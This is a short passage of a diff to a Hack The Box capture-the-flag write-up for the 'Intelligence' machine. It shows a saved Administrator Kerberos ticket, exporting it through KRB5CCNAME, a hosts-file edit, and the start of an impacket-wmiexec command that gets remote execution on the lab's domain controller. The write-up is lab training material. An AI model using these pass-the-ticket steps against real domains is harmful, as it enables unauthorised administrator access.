axcheron/axcheron.github.io/_htb/11_writeup_intelligence.md

 [*] Saving ticket in Administrator.ccache
 ```

-Nice, we have a ticket, we can export it with `export KRB5CCNAME=Administrator.ccache` and use it with [impacket-wmiexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py).
+Nice, we have a ticket, we can export it with `export KRB5CCNAME=Administrator.ccache` and use it with [impacket-wmiexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py) to grab the **second flag**.

 Note that you will need to add `10.129.95.154 dc.intelligence.htb` to your **/etc/hosts** file as the `-k` switch will use our credentials from ccache file (KRB5CCNAME) and it needs the FQDN.

 ```bash
 $ impacket-wmiexec -k -no-pass dc.intelligence.htb